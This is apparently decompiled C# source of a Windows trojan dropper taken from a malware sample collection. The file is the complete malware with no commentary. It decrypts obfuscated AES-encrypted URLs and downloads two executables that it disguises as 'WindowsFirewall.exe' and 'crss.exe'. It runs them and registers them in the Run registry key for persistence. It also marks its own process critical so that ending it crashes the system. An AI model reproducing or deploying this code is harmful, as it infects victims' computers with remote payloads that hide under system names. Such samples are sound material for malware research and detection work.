// Decompiled with JetBrains decompiler
// Type: vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
// Assembly: Downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B96CE03-B080-4512-8CC1-7DDE95F54AAA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfcm-c01557638a82910361f2149b9432ad8f42d2d17a53d31917bcdb34e91acc08e6.exe

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;

internal static class vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
{
  [DllImport("ntdll")]
  private static extern int NtSetInformationProcess(IntPtr p, int c, ref int i, int l);

  public static void Main()
  {
    int i1 = 1;
    vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i1, 4);
    try
    {
      string fileName = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\WindowsFirewall.exe";
      new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9DovkArANHKiv+rqzid4MVJn5b"), fileName);
      Process.Start(fileName);
      Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
    }
    catch
    {
    }
    try
    {
      string fileName = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\crss.exe";
      new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9Dovl1hmWyr2yTB16aQjN0YI1t"), fileName);
      Process.Start(fileName);
      Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
    }
    catch
    {
    }
    int i2 = 0;
    vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i2, 4);
  }

  private static string ÍƾYjƔơƻƄT(string ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ)
  {
    RijndaelManaged rijndaelManaged = new RijndaelManaged();
    MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider();
    byte[] destinationArray = new byte[32];
    byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes("u y"));
    Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
    Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16);
    rijndaelManaged.Key = destinationArray;
    rijndaelManaged.Mode = CipherMode.ECB;
    ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor();
    byte[] inputBuffer = Convert.FromBase64String(ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ);
    return Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
  }
}